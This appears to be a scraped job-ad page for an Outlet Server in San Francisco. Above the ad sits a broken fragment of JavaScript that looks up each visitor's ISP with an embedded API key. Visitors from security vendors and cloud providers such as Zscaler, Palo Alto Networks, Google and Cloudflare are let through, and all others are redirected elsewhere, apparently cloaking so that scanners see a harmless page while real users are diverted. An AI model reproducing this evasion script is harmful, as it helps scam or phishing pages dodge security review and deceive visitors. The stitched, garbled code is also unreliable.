Outlet Server
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a friendly and attentive Outlet Server to join our dynamic team in San Francisco, CA. As an Outlet Server, you will provide exceptional guest service, take food and beverage orders, and ensure timely delivery of orders in a fast-paced environment.
Responsibilities include:
- Greeting guests promptly and professionally
- Taking accurate food and beverage orders
- Serving food and drinks efficiently and courteously
- Maintaining cleanliness and organization of service areas
- Assisting guests with menu selections and special requests
- Processing payments accurately and efficiently
- Collaborating with team members to ensure smooth operations
Skills needed:
- Excellent communication and interpersonal skills
- Strong attention to detail
- Ability to multitask in a fast-paced setting
- Positive attitude and team-oriented mindset
Benefits:
- Competitive hourly wage plus tips
- Flexible scheduling
- Employee dining discounts
- Opportunities for growth and development
- Supportive team environment